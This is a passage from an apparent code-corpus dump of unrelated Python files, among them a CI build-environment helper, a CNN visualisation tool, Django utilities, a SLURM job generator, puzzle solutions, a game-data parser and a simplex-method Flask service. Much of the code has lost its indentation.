(-1, 1), (0, 1), (1, 1)]
for dx, dy in near:
nx = x//20 + dx
ny = y//20 + dy
if 0 <= nx <= 1000 and 0 <= ny <= 1000:
for cx, cy in field[nx][ny]:
# print(x, y, nx, ny, cx, cy, isOverlap(x, y, cx, cy))
if isOverlap(x, y, cx, cy):
return False
return True
field = [[[] for _ in range(1001)] for _ in range(1001)]
ans = 0
for _ in range(N):
x, y = map(int, input().split())
if check(x, y):
ans += 1
field[x//20][y//20].append((x, y))
print(ans)
| 803 |
servers/server_config.py | LGWingEmulator/tools-buildSrc | 0 | 2169967 |
from distutils.spawn import find_executable
import itertools
import logging
import os
import platform
import subprocess
try:
import _winreg as winreg
except:
# Winreg is a windows only thing..
pass
def disable_debug_policy():
try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                            r"SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting",
                            0, winreg.KEY_SET_VALUE) as registry_key:
            # DontShowUI is a DWORD value, so it has to be written with SetValueEx.
            winreg.SetValueEx(registry_key, "DontShowUI", 0, winreg.REG_DWORD, 1)
    except:
        logging.error("Failed to disable the Windows Error Reporting UI.")
# Next clear out the just in time debuggers.
todelete = [(r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug", "Debugger"),
(r"SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug", "Debugger")]
for current_key, entry in todelete:
try:
# See https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019#disable-just-in-time-debugging-from-the-windows-registry)
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, current_key, 0, winreg.KEY_ALL_ACCESS) as open_key:
winreg.DeleteValue(open_key, entry)
except:
pass
# A class that is responsible for configuring the server when running the build.
class ServerConfig(object):
def __init__(self, presubmit):
self.presubmit = presubmit
self.env = os.environ.copy()
self.ccache = find_executable('ccache')
def get_env(self):
return self.env
def __enter__(self):
# On windows we do not want debug ui to be activated.
if platform.system() == 'Windows':
disable_debug_policy()
# Never run ccache outside of presubmit, even if it might be available.
if not self.presubmit:
self.env['CCACHE_DISABLE'] = 'True'
logging.info('Disabling ccache.')
else:
# We cannot rely on mtime for compiler identification as the build bots
# do a fresh checkout of the compiler.
self.env['CCACHE_COMPILERCHECK'] = 'string:%compiler% --version'
if self.ccache:
logging.info('Enabling ccache.')
return self
def __exit__(self, exc_type, exc_value, tb):
# We clear the cache in case of failures.
if exc_type and exc_value:
if self.ccache:
logging.info('Clearing ccache.')
subprocess.call([self.ccache, '-C'])
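# Intended usage (my sketch; `build_cmd` is a placeholder for the actual build
# invocation): the context manager tweaks the environment on entry and clears
# the ccache if the build fails.
#
#   cfg = ServerConfig(presubmit=True)
#   with cfg:
#       subprocess.check_call(build_cmd, env=cfg.get_env())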
| 2,457 |
torchprism/PRISM.py | szandala/PRISM | 0 | 2170061 |
from torch.nn import Conv2d, MaxPool2d
from torch import no_grad, round
from torch.nn.functional import interpolate
from itertools import chain
class PRISM:
_excitations = []
_hook_handlers = []
_is_orig_image = True
def _excitation_hook(module, input, output):
# for better output sharpness we collect input images
if PRISM._is_orig_image:
PRISM._excitations.append(input[0])
PRISM._is_orig_image = False
PRISM._excitations.append(output)
def register_hooks(model, recursive=False):
if not recursive and PRISM._hook_handlers:
print("Hooks can only be registered to one model at once. Please use: `prune_old_hooks()`")
return
for i, layer in enumerate(model.children()):
if list(layer.children()):
PRISM.register_hooks(layer, recursive=True)
elif isinstance(layer, MaxPool2d):
PRISM._hook_handlers.append(
layer.register_forward_hook(PRISM._excitation_hook)
)
elif isinstance(layer, Conv2d) and layer.stride > (1, 1):
PRISM._hook_handlers.append(
layer.register_forward_hook(PRISM._excitation_hook)
)
def prune_old_hooks(model):
if not PRISM._hook_handlers:
print("No hooks to remove")
for hook in PRISM._hook_handlers:
hook.remove()
PRISM._hook_handlers = []
###############################################
def _svd(final_excitation):
final_layer_input = final_excitation.permute(0, 2, 3, 1).reshape(
-1, final_excitation.shape[1]
)
normalized_final_layer_input = final_layer_input - final_layer_input.mean(0)
# normalized_final_layer_input = final_layer_input
u, s, v = normalized_final_layer_input.svd(compute_uv=True)
raw_features = u[:, :3].matmul(s[:3].diag())
return raw_features.view(
final_excitation.shape[0],
final_excitation.shape[2],
final_excitation.shape[3],
3
).permute(0, 3, 1, 2)
def _quantize(maps):
# h,w,c
maps = PRISM._normalize_to_rgb(maps).permute(0, 2, 3, 1)
quant_maps = 0.5 * round(maps / 0.5)
image_colors = []
for img in quant_maps:
colors_set = set()
for row in img:
for pixel in row:
colors_set.add(pixel.numpy().tostring())
image_colors.append(colors_set)
return quant_maps, image_colors
def _intersection(maps):
quant_maps, image_colors = PRISM._quantize(maps)
common_colors = set.intersection(*image_colors)
for img in quant_maps:
for row in img:
for pixel in row:
if pixel.numpy().tostring() not in common_colors:
pixel *= 0.0
return quant_maps.permute(0, 3, 1, 2)
def _difference(maps):
quant_maps, image_colors = PRISM._quantize(maps)
all_colors= set(chain.from_iterable(image_colors))
exclusive_colors = all_colors - set.intersection(*image_colors)
for img in quant_maps:
for row in img:
for pixel in row:
if pixel.numpy().tostring() not in exclusive_colors:
pixel *= 0.0
return quant_maps.permute(0, 3, 1, 2)
def _upsampling(extracted_features, pre_excitations):
for e in pre_excitations[::-1]:
extracted_features = interpolate(
extracted_features,
size=(e.shape[2], e.shape[3]),
mode="bilinear",
align_corners=False,
)
extracted_features *= e.mean(dim=1, keepdim=True)
return extracted_features
def _normalize_to_rgb(features):
scaled_features = (features - features.mean()) / features.std()
scaled_features = scaled_features.clip(-1, 1)
scaled_features = (scaled_features - scaled_features.min()) / (
scaled_features.max() - scaled_features.min()
)
return scaled_features
def get_maps(grad_extrap=True, inclusive=False, exclusive=False):
if not PRISM._excitations:
print("No data in hooks. Have You used `register_hooks(model)` method?")
return
# [print(e.shape) for e in PRISM._excitations]
with no_grad():
extracted_features = PRISM._svd(PRISM._excitations.pop())
if inclusive and exclusive:
rgb_features_map, _ = PRISM._quantize(extracted_features)
rgb_features_map = rgb_features_map.permute(0, 3, 1, 2)
elif exclusive:
rgb_features_map = PRISM._difference(extracted_features)
elif inclusive:
rgb_features_map = PRISM._intersection(extracted_features)
else:
rgb_features_map = extracted_features
if grad_extrap:
rgb_features_map = PRISM._upsampling(
rgb_features_map, PRISM._excitations
)
rgb_features_map = PRISM._normalize_to_rgb(rgb_features_map)
# prune old PRISM._excitations
PRISM.reset_excitations()
return rgb_features_map
def reset_excitations():
PRISM._is_orig_image = True
PRISM._excitations = []
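# Typical use (a sketch under my assumptions -- any torchvision-style CNN and a
# preprocessed image batch `images` of shape (N, 3, H, W) would do):
#
#   import torch, torchvision
#   model = torchvision.models.vgg16().eval()
#   PRISM.register_hooks(model)
#   with torch.no_grad():
#       model(images)            # the forward pass fills the hooks
#   maps = PRISM.get_maps()      # (N, 3, H, W) RGB feature maps
#   PRISM.prune_old_hooks(model)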
| 5,475 |
messengerext/home/templatetags/ifrole.py | groupsome/groupsome | 6 | 2169995 |
from django import template
class IfRoleNode(template.Node):
def __init__(self, nodelist, role):
self.nodelist = nodelist
self.role = role
def render(self, context):
user = context.request.user
group = context["group"]
if group.has_role(user, self.role):
return self.nodelist.render(context)
return ""
def ifrole(parser, token):
nodelist = parser.parse(('endifrole',))
parser.delete_first_token()
try:
        tag, role = token.split_contents()
    except ValueError:
        raise template.TemplateSyntaxError("%r tag requires one argument" % token.contents.split()[0])
    return IfRoleNode(nodelist, role.strip('"\''))
register = template.Library()
register.tag('ifrole', ifrole)
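# Template usage (illustrative; the role string depends on the project's group
# model, and the template must have a `group` variable in its context):
#
#   {% load ifrole %}
#   {% ifrole "admin" %} ... rendered only for users with that role ... {% endifrole %}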
| 775 |
mysalon/forms.py | Nyakinyua/Bookings | 0 | 2169908 |
from django import forms
from .models import *
from pyuploadcare.dj.forms import ImageField
from django.contrib.auth.models import User
class AddCommentForm(forms.ModelForm):
class Meta:
model = Comments
exclude = ['user','post']
# class CustomSignupForm(signupForm):
# first_name = forms.CharField(max_length=30, label='First Name')
# last_name = forms.CharField(max_length=30, label='Last Name')
# def signup(self,request,user):
# user.first_name = self.cleaned_data['first_name']
# user.last_name = self.cleaned_data['last_name']
# user.save()
# return user
| 635 |
c/ch8/genweak.py | thw1021/p4pdes | 115 | 2170034 |
#!/usr/bin/env python3
# WARNING: You will need to edit this file to match your batch system!!
from argparse import ArgumentParser, RawTextHelpFormatter
import numpy as np
intro = '''
Write SLURM batch files for weak scaling study using ch7/minimal.c. Examples:
./genweak.py -email <EMAIL> -queue debug -maxP 1 -minutes 60
./genweak.py -email <EMAIL> -queue debug -minP 4 -maxP 4 -pernode 2 -minutes 60
./genweak.py -email <EMAIL> -queue debug -minP 4 -maxP 4 -pernode 4 -minutes 60
./genweak.py -email <EMAIL> -queue t2standard -minP 4 -maxP 4 -pernode 1 -minutes 60
./genweak.py -email <EMAIL> -queue t2standard -minP 16 -maxP 64 -pernode 4 -minutes 60
./genweak.py -email <EMAIL> -queue t2standard -minP 16 -maxP 256 -pernode 8 -minutes 60
Solves 2D minimal surface equation using grid-sequenced Newton GMRES+GMG solver
and 33x33 coarse grid. Each process gets a 1024x1024 grid with N/P = 1.05e6.
'''
parser = ArgumentParser(description=intro, formatter_class=RawTextHelpFormatter)
parser.add_argument('-email', metavar='EMAIL', type=str,
default='<EMAIL>', help='email address')
parser.add_argument('-maxP', type=int, default=4, metavar='P',
help='''maximum number of MPI processes;
power of 4 like 4,16,64,256,1024,... recommended''')
parser.add_argument('-minP', type=int, default=1, metavar='P',
help='''minimum number of MPI processes;
power of 4 like 1,4,16,64,256,... recommended''')
parser.add_argument('-minutes', type=int, default=60, metavar='T',
help='''max time in minutes for SLURM job''')
parser.add_argument('-queue', metavar='Q', type=str,
default='debug', help='SLURM queue (partition) name')
parser.add_argument('-pernode', type=int, default=2, metavar='K',
help='''maximum number of MPI processes to assign to each node;
small value may increase streams bandwidth and performance''')
parser.add_argument('-streams', action='store_true', default=False,
help='include "make streams" before run (but may hang on attempt to use python?)')
args = parser.parse_args()
print('settings: %s queue, %d max tasks per node, %s as email, request time %d minutes'
% (args.queue,args.pernode,args.email,args.minutes))
m_min = int(np.floor(np.log(float(args.minP)) / np.log(4.0)))
m_max = int(np.floor(np.log(float(args.maxP)) / np.log(4.0)))
Plist = np.round(4.0**np.arange(m_min,m_max+1)).astype(int).tolist()
print('runs (ch7/minimal.c) will use P in', Plist)
rawpre = r'''#!/bin/bash
#SBATCH --partition=%s
#SBATCH --ntasks=%d
#SBATCH --tasks-per-node=%d
#SBATCH --time=%d
#SBATCH --mail-user=%s
#SBATCH --mail-type=BEGIN
#SBATCH --mail-type=END
#SBATCH --mail-type=FAIL
#SBATCH --output=%s
# This cluster needs these for some reason.
ulimit -s unlimited
ulimit -l unlimited
# Generate a list of allocated nodes as a machinefile for mpiexec.
srun -l /bin/hostname | sort -n | awk '{print $2}' > ./nodes.$SLURM_JOB_ID
# Launches the MPI application.
GO="mpiexec -n $SLURM_NTASKS -machinefile ./nodes.$SLURM_JOB_ID"
cd $SLURM_SUBMIT_DIR
'''
rawstreams= r'''
# Get streams info for these processes.
cd $PETSC_DIR
make streams NPMAX=$SLURM_NTASKS
cd $SLURM_SUBMIT_DIR
'''
rawminimal = r'''
# MINIMAL: solve 2D minimal surface equation
# using grid-sequenced Newton GMRES+GMG solver and 33x33 coarse grid
# with -snes_grid_sequence %d is %dx%d fine grid
# each process has N/P = %d degrees of freedom
$GO ../ch7/minimal -da_grid_x 33 -da_grid_y 33 -snes_grid_sequence %d -snes_fd_color -snes_converged_reason -snes_monitor -ksp_converged_reason -pc_type mg -log_view
'''
minimaldict = { 1: (5,1025),
4: (6,2049),
16: (7,4097),
64: (8,8193),
256: (9,16385)}
for P in Plist:
rlev = minimaldict[P][0] # refinement level
grid = minimaldict[P][1]
wrun = rawminimal % (rlev,grid,grid,grid*grid/P,rlev)
pernode = min(P,args.pernode)
nodes = P / pernode
print(' case: %d nodes, %d tasks per node, and P=%d processes on %dx%d grid'
% (nodes,pernode,P,grid,grid))
root = 'weak_minimal_%s_%d_%d' % (args.queue[:2],P,pernode)
preamble = rawpre % (args.queue,P,pernode,args.minutes,args.email,
root + r'.o.%j')
batchname = root + '.sh'
print(' writing %s ...' % batchname)
batch = open(batchname,'w')
batch.write(preamble)
if args.streams:
batch.write(rawstreams)
batch.write(wrun)
batch.close()
| 4,564 |
2016/day08/two_factor.py | kmcginn/advent-of-code | 0 | 2168746 |
""" Solution to Day 8
from: http://adventofcode.com/2016/day/8
--- Day 8: Two-Factor Authentication ---
You come across a door implementing what you can only assume is an implementation of two-factor
authentication after a long game of requirements telephone.
To get past the door, you first swipe a keycard (no problem; there was one on a nearby desk). Then,
it displays a code on a little screen, and you type that code on a keypad. Then, presumably, the
door unlocks.
Unfortunately, the screen has been smashed. After a few minutes, you've taken everything apart and
figured out how it works. Now you just have to work out what the screen would have displayed.
The magnetic strip on the card you swiped encodes a series of instructions for the screen; these
instructions are your puzzle input. The screen is 50 pixels wide and 6 pixels tall, all of which
start off, and is capable of three somewhat peculiar operations:
rect AxB turns on all of the pixels in a rectangle at the top-left of the screen which is A wide
and B tall.
rotate row y=A by B shifts all of the pixels in row A (0 is the top row) right by B pixels. Pixels
that would fall off the right end appear at the left end of the row.
rotate column x=A by B shifts all of the pixels in column A (0 is the left column) down by B
pixels. Pixels that would fall off the bottom appear at the top of the column.
For example, here is a simple sequence on a smaller screen:
rect 3x2 creates a small rectangle in the top-left corner:
###....
###....
.......
rotate column x=1 by 1 rotates the second column down by one pixel:
#.#....
###....
.#.....
rotate row y=0 by 4 rotates the top row right by four pixels:
....#.#
###....
.#.....
rotate column x=1 by 1 again rotates the second column down by one pixel, causing the bottom pixel
to wrap back to the top:
.#..#.#
#.#....
.#.....
As you can see, this display technology is extremely powerful, and will soon dominate the
tiny-code-displaying-screen market. That's what the advertisement on the back of the display tries
to convince you, anyway.
There seems to be an intermediate check of the voltage used by the display: after you swipe your
card, if the screen did work, how many pixels should be lit?
--- Part Two ---
You notice that the screen is only capable of displaying capital letters; in the font it uses,
each letter is 5 pixels wide and 6 tall.
After you swipe your card, what code is the screen trying to display?
"""
def print_display(display):
"""Print a nice visualization of the display, for funsies"""
for row in display:
output = ''
for col in row:
output += col
print(output)
def process_instruction(instruction, display):
"""Apply the given instruction to the display"""
parsed = instruction.split()
if parsed[0] == 'rect':
width, height = [int(x) for x in parsed[1].split('x')]
for row in range(0, height):
for col in range(0, width):
display[row][col] = '#'
elif parsed[0] == 'rotate':
if parsed[1] == 'row':
row = int(parsed[2].split('=')[1])
rotation = int(parsed[4])
display[row] = display[row][-rotation:] + display[row][:-rotation]
elif parsed[1] == 'column':
col = int(parsed[2].split('=')[1])
rotation = int(parsed[4])
# TODO: populate rotated_display in a better way
            rotated_display = []
for row in range(len(display)-rotation, len(display)):
rotated_display.append(display[row].copy())
for row in range(0, len(display)-rotation):
rotated_display.append(display[row].copy())
for row in range(0, len(display)):
display[row][col] = rotated_display[row][col]
else:
raise Exception
else:
raise Exception
return display
def main():
"""Solve the problem, yo!"""
display_width = 50
display_height = 6
display = [['.' for i in range(0, display_width)] for i in range(0, display_height)]
instructions = list()
with open("input.txt") as input_file:
for line in input_file:
instructions.append(line)
for instr in instructions:
display = process_instruction(instr, display)
print_display(display)
# count the illuminated pixels
on_count = 0
for row in display:
for col in row:
if col == '#':
on_count += 1
print(on_count)
if __name__ == "__main__":
main()
| 4,555 |
turing/tape.py | zhzLuke96/Tur-ing | 0 | 2169275 |
class tape:
def __init__(self,call=None):
self.this = [0]
self.cursor = 0
self.call = call
def get(self):
return self.this[self.cursor]
def set(self, val):
if self.call is not None:self.call()
self.this[self.cursor] = abs(val)
def getChar(self, b):
return chr(self.get() + b)
def inc(self):
if self.call is not None:self.call()
self.this[self.cursor] += 1
def sub(self):
if self.call is not None:self.call()
self.this[self.cursor] -= 1
def rise(self):
self.cursor += 1
if len(self.this) <= self.cursor:
self.this.append(0)
def drop(self):
self.cursor -= 1
def disp(self, b, g):
print(self.getChar(b) + g, end="")
def dispVal(self, b, g):
print(str(self.get()) + g, end='')
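if __name__ == "__main__":
    # Minimal demonstration (mine, not part of the original module): a
    # Brainfuck-style tape of non-negative cells with a movable cursor.
    t = tape()
    t.inc()
    t.inc()
    t.inc()             # cell 0 is now 3
    t.rise()            # move the cursor right; the tape grows on demand
    t.set(65)           # cell 1 is now 65
    t.disp(0, "\n")     # prints chr(65) -> "A"
    t.drop()            # back to cell 0
    t.dispVal(0, "\n")  # prints "3"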
| 863 |
inferlo/pairwise/inference/tree_dp_test.py | InferLO/inferlo | 1 | 2167792 |
# Copyright (c) 2020, The InferLO authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 - see LICENSE file.
import numpy as np
from inferlo import PairWiseFiniteModel
from inferlo.testing import (tree_potts_model,
line_potts_model, assert_results_close)
def test_vert15_alph2():
model = tree_potts_model(gr_size=10, al_size=2, seed=123)
ground_truth = model.infer(algorithm='bruteforce')
result = model.infer(algorithm='tree_dp')
assert_results_close(result, ground_truth)
def test_vert5_alph3():
model = tree_potts_model(gr_size=5, al_size=3, seed=123)
ground_truth = model.infer(algorithm='bruteforce')
result = model.infer(algorithm='tree_dp')
assert_results_close(result, ground_truth)
def test_long_line():
gr_size = 1000
al_size = 5
j = np.ones((al_size, al_size)) + np.eye(al_size)
model = line_potts_model(gr_size=gr_size, al_size=al_size,
seed=111, same_j=j, zero_field=True)
result = model.infer(algorithm='tree_dp')
assert np.allclose(result.marg_prob,
np.ones((gr_size, al_size)) / al_size)
def test_big_tree():
gr_size = 1000
al_size = 5
j = np.ones((al_size, al_size)) + np.eye(al_size)
model = tree_potts_model(gr_size=gr_size, al_size=al_size,
seed=111, same_j=j, zero_field=True)
result = model.infer(algorithm='tree_dp')
assert np.allclose(result.marg_prob,
np.ones((gr_size, al_size)) / al_size)
def test_fully_isolated():
model = PairWiseFiniteModel(10, 2)
model.set_field(np.random.random(size=(10, 2)))
ground_truth = model.infer(algorithm='bruteforce')
result = model.infer(algorithm='tree_dp')
assert_results_close(result, ground_truth)
| 1,830 |
setup.py | PermutaTriangle/PermStruct | 1 | 2170033 |
#!/usr/bin/env python
import os
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "permstruct",
version = "0.0.1",
author = "<NAME>",
author_email = "<EMAIL>",
description = "An implementation of the PermStruct algorithm.",
license = "BSD-3",
keywords = "permutations generating rules",
url = "https://github.com/PermutaTriangle/PermStruct",
packages=[
'permstruct',
'permstruct.dag',
'permstruct.permutation_sets',
'permstruct.permutation_sets.units',
],
long_description=read('README.md'),
test_suite = 'tests'
)
| 678 |
retro_data_structures/formats/script_object.py | EthanArmbrust/Retro-data-structures | 2 | 2168733 |
"""
https://wiki.axiodl.com/w/Scriptable_Layers_(File_Format)
"""
import io
from typing import Iterator
import construct
from construct import Container
from construct.core import (
Adapter, BitStruct, BitsInteger, GreedyBytes, Hex, Int8ub, Int16ub, Int32ub, Prefixed,
PrefixedArray, Struct, Union,
)
from retro_data_structures import game_check
from retro_data_structures.common_types import FourCC
from retro_data_structures.game_check import Game, current_game_at_least_else
from retro_data_structures.property_template import GetPropertyConstruct
def Connection(subcon):
return Struct(
state=subcon,
message=subcon,
target=Hex(Int32ub),
)
class ScriptInstanceAdapter(Adapter):
def __init__(self, obj_id_func):
super().__init__(GreedyBytes)
self.obj_id_func = obj_id_func
def _get_property_construct(self, context):
game = construct.evaluate(game_check.get_current_game, context)
obj_id = construct.evaluate(self.obj_id_func, context)
return GetPropertyConstruct(game, obj_id)
def _decode(self, obj, context, path):
subcon = self._get_property_construct(context)
return subcon._parsereport(io.BytesIO(obj), context, path)
def _encode(self, obj, context, path):
subcon = self._get_property_construct(context)
encoded = io.BytesIO()
subcon._build(obj, encoded, context, path)
return encoded.getvalue()
def ThisTypeAsString(this):
return f"0x{this._.type:X}" if isinstance(this._.type, int) else this._.type
_prefix = current_game_at_least_else(Game.ECHOES, Int16ub, Int32ub)
ScriptInstance = Struct(
type=game_check.current_game_at_least_else(Game.ECHOES, FourCC, Int8ub),
instance=Prefixed(
_prefix,
Struct(
id=Union(
"raw",
"raw" / Hex(Int32ub),
"parts" / BitStruct(
"layer" / BitsInteger(6),
"area" / BitsInteger(10),
"instance" / BitsInteger(16)
)
),
connections=PrefixedArray(_prefix, Connection(current_game_at_least_else(Game.ECHOES, FourCC, Int32ub))),
# base_property=ScriptInstanceAdapter(ThisTypeAsString),
base_property=GreedyBytes,
),
),
)
class ScriptInstanceHelper:
_raw: Container
target_game: Game
def __init__(self, raw: Container, target_game: Game):
self._raw = raw
self.target_game = target_game
def __str__(self):
return "<ScriptInstance {} 0x{:08x}>".format(self.type_name, self.id)
def __eq__(self, other):
return isinstance(other, ScriptInstanceHelper) and self._raw == other._raw
@classmethod
def new_instance(cls, target_game: Game, instance_type):
prop_construct = GetPropertyConstruct(target_game, instance_type, True)
# TODO: make this less ugly lmao
raw = ScriptInstance.parse(ScriptInstance.build({
"type": instance_type,
"instance": {
"id": {"raw": 0},
"connections": [],
"base_property": prop_construct.build({}, target_game=target_game)
}
}, target_game=target_game), target_game=target_game)
return cls(raw, target_game)
@property
def type(self) -> str:
return self._raw.type
@property
def type_name(self) -> str:
try:
return self.get_properties()["_name"]
except Exception:
return self.type
@property
def id(self) -> int:
return self._raw.instance.id.raw
@property
def name(self) -> str:
return self.get_property(("EditorProperties", "Name"))
@property
def _property_construct(self):
return GetPropertyConstruct(self.target_game, self.type)
def get_properties(self):
return self._property_construct.parse(
self._raw.instance.base_property,
target_game=self.target_game,
)
def set_properties(self, data: Container):
self._raw.instance.base_property = self._property_construct.build(
data, target_game=self.target_game,
)
def get_property(self, chain: Iterator[str]):
prop = self.get_properties()
for name in chain:
prop = prop[name]
return prop
@property
def connections(self):
return self._raw.instance.connections
def add_connection(self, state, message, target: "ScriptInstanceHelper"):
self.connections.append(Container(
state=state,
message=message,
target=target.id
))
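# Illustrative only (my sketch): the helper is normally built from parsed
# script-layer data; the instance types and the state/message FourCCs below are
# placeholders, not values taken from an actual game.
#
#   instance = ScriptInstanceHelper.new_instance(Game.ECHOES, "TRGR")
#   other = ScriptInstanceHelper.new_instance(Game.ECHOES, "RELA")
#   instance.add_connection("ENTR", "ACTV", other)
#   print(instance.type, hex(instance.id), len(instance.connections))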
| 4,695 |
pyqtnavutils/__init__.py | dhzdhd/pyqt_nav_utils | 0 | 2168546 |
"""PyQtNavUtils - Customisable animated Drawer and NavBar widgets."""
from pyqtnavutils.drawer import DraggableDrawer, Drawer
from pyqtnavutils.navbar import NavigationBar, NavigationBarItem
__all__ = ["Drawer", "DraggableDrawer", "NavigationBar", "NavigationBarItem"]
| 272 |
csat/acquisition/urls.py | GaretJax/csat | 0 | 2169033 |
from django.conf.urls import patterns, url
urlpatterns = patterns(
'csat.acquisition.views',
url(
r'^$',
'session_index',
name='session-index'
),
url(
r'^new/$',
'session_create',
name='session-create'
),
url(
r'^(?P<pk>\d+)/$',
'session_view',
name='session'
),
url(
r'^(?P<pk>\d+)/edit/$',
'session_edit',
name='session-edit'
),
url(
r'^(?P<pk>\d+)/reset/$',
'session_reset',
name='session-reset'
),
url(
r'^(?P<pk>\d+)/run/$',
'session_run',
name='session-run'
),
url(
r'^(?P<pk>\d+)/thumbnail.png$',
'session_thumbnail',
name='session-thumbnail'
),
url(
r'^(?P<pk>\d+)/delete/$',
'session_delete',
name='session-delete'
),
url(
r'^results/(?P<result_id>[^/]+)/$',
'collector_upload_results',
name='collector-upload-results'
),
url(
r'^(?P<session_pk>\d+)/add/(?P<collector>[^/]+)/$',
'collector_create',
name='collector-create'
),
url(
r'^(?P<session_pk>\d+)/edit/(?P<collector_pk>\d+)/$',
'collector_edit',
name='collector-edit'
),
url(
r'^(?P<session_pk>\d+)/delete/(?P<collector_pk>\d+)/$',
'collector_remove',
name='collector-remove'
),
url(
(r'^(?P<session_pk>\d+)/(?P<collector_pk>\d+)/log.'
'(?P<format>txt|html)?$'),
'collector_view_log',
name='collector-view-log'
),
url(
(r'^(?P<session_pk>\d+)/(?P<collector_pk>\d+)/graph.'
'(?P<format>graphml|html)?$'),
'collector_view_results',
name='collector-view-results'
),
url(
r'^(?P<session_pk>\d+)/graph.(?P<format>html|graphml)?$',
'session_view_results',
name='session-view-results'
),
)
| 1,957 |
renovation_core/doc_events/system_settings.py | Abadulrehman/renovation_core | 18 | 2169646 |
import frappe
def on_change(doc, method):
from ..utils.logging import update_cache
update_cache()
def before_update(doc, method):
if doc.get("sms_settings") and not frappe.db.get_value('SMS Settings', None, 'sms_gateway_url'):
provider = frappe.get_doc("SMS Provider", doc.get("sms_settings"))
sms_settings = frappe.get_single("SMS Settings")
data = provider.as_dict()
del data["name"]
del data["doctype"]
sms_settings.update(data)
sms_settings.flags.ignore_permissions = True
sms_settings.save()
| 539 |
rfmodel.py | Codeomicronzeta/Churn-Model | 0 | 2168642 |
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
data = pd.read_csv('Processed_Churn_data.csv')
dep_var = data.iloc[:, 0:15]
churn = data['Exited']
# Creating Train and Test Set
X_train, X_val, y_train, y_val = train_test_split(dep_var, churn, random_state = 0)
# Creating Random Forest Model
model_pi = RandomForestClassifier(random_state=1, n_estimators = 2000)
model_pi = model_pi.fit(X_train[['Age', 'NumOfProducts', 'EstimatedSalary', 'CreditScore', 'Balance', 'Tenure']],
y_train)
preds_mpi = model_pi.predict(X_val[['Age', 'NumOfProducts', 'EstimatedSalary', 'CreditScore', 'Balance', 'Tenure']])
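# accuracy_score is imported above but never used; presumably the intent was to
# score the hold-out predictions, e.g.:
print("Validation accuracy:", accuracy_score(y_val, preds_mpi))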
| 727 |
algorithm-server/main.py | qiruiqwe/Optimization | 1 | 2169735 |
# @Time : 2020/12/6 22:47
# @Author : 亓瑞
# @File : main.py
# @desc :
import numpy as np
from flask import Flask, request, jsonify, make_response
import json
from trans import trans
app = Flask(__name__)
class Simplex(object):
@staticmethod
def min(data):
(width, length) = data.shape
base_list = list(range(length - width, length - 1))
while True:
no_base_list = [i for i in range(length - 1) if i not in base_list]
c_b = data[0][base_list]
distinguish_number = [np.dot(data[1:, i], c_b) - data[0][i] for i in no_base_list]
            # 1. Compute the current objective (fitness) value
b = data[1:, length - 1]
fit = np.dot(b, c_b)
            # 2. Stop the loop once every check number is < 0
if max(distinguish_number) < 0:
                # base_list holds the indices of the basic variables, b their values
return fit, base_list, b
else:
                # 3. Entering column index
column = no_base_list[distinguish_number.index(max(distinguish_number))]
                # 4. Leaving row (minimum ratio test)
temp = []
for a, c in zip(data[1:, length - 1], data[1:, column]):
if c <= 0:
temp.append(float('inf'))
else:
temp.append(a / c)
if min(temp) == float('inf'):
                    # 4.1 No row can leave the basis (unbounded); return the current solution
return fit, base_list, b
else:
row_index = temp.index(min(temp))
                    # Pivot: update the tableau
base_list[row_index] = column
row_index += 1
data[row_index, :] /= data[row_index, column]
for i in [x for x in range(1, width) if x != row_index]:
data[i, :] += (-data[i, column] * data[row_index, :])
@staticmethod
def max(data):
(width, length) = data.shape
base_list = list(range(length - width, length - 1))
while True:
no_base_list = [i for i in range(length - 1) if i not in base_list]
c_b = data[0][base_list]
distinguish_number = [np.dot(data[1:, i], c_b) - data[0][i] for i in no_base_list]
            # 1. Compute the current objective (fitness) value
b = data[1:, length - 1]
fit = np.dot(b, c_b)
            # 2. Stop the loop once every check number is > 0 (optimal for the max problem)
if min(distinguish_number) > 0:
return fit, base_list, b
else:
                # 3. Entering column index
column = no_base_list[distinguish_number.index(min(distinguish_number))]
                # 4. Leaving row (minimum ratio test)
temp = []
for a, c in zip(data[1:, length - 1], data[1:, column]):
if c <= 0:
temp.append(float('inf'))
else:
temp.append(a / c)
if min(temp) == float('inf'):
                    # 4.1 No row can leave the basis (unbounded); return the current solution
return fit, base_list, b
else:
row_index = temp.index(min(temp))
                    # Pivot: update the tableau
base_list[row_index] = column
row_index += 1
data[row_index, :] /= data[row_index, column]
for i in [x for x in range(1, width) if x != row_index]:
data[i, :] += (-data[i, column] * data[row_index, :])
@staticmethod
def formatString(data, flag, value, base_list, base_value):
        # flag = 0 -> minimum problem, flag = 1 -> maximum problem
v_name = []
(width, length) = data.shape
for i in range(length):
v_name.append('x'+str(i+1))
# print(v_name)
if flag == 0:
message = 'min '
param = "最小值为:"
else:
message = 'max '
param = "最大值为:"
for j in range(length - 1):
if data[0][j] == 0:
message = message + " "
else:
message = message + '%2s' % str(int(data[0][j])) + '*' + '%4s' % v_name[j]
if data[0][j+1] > 0:
message = message + ' + '
elif data[0][j+1] == 0:
pass
all_message = message + '#'
for i in range(1, width):
message = ''
for j in range(length-1):
if data[i][j] == 0:
message = message + " "
else:
message = message + '%2s' % str(int(data[i][j])) + '*' + '%4s' % v_name[j]
if data[i][j + 1] > 0 and (j+1) != (length-1):
message = message + '+'
elif data[i][j + 1] == 0:
pass
message = message + ' = ' + '%2s' % str(int(data[i][length-1]))
all_message = all_message + message + "#"
all_message += '#'
all_message = all_message + '%-8s' %param + '%2s' % str(value) + '#'
result = ''
print(base_list)
print(base_value)
for i in zip(base_list, base_value):
result += '%-4s' % v_name[i[0]] + ' = ' + '%5s' % str(i[1]) + '#'
all_message = all_message + result
print(all_message)
return all_message
def getString(s,d):
str = '产量:'
for i in s:
str += '%4s %3d\t' % (i[0], i[1])
str += '\n'+'销量:'
for i in d:
str += '%4s %3d\t' % (i[0], i[1])
str += '\n'
return str
@app.route('/simplexMin', methods=['GET', 'POST'])
def simplex_min():
params = request.get_data()
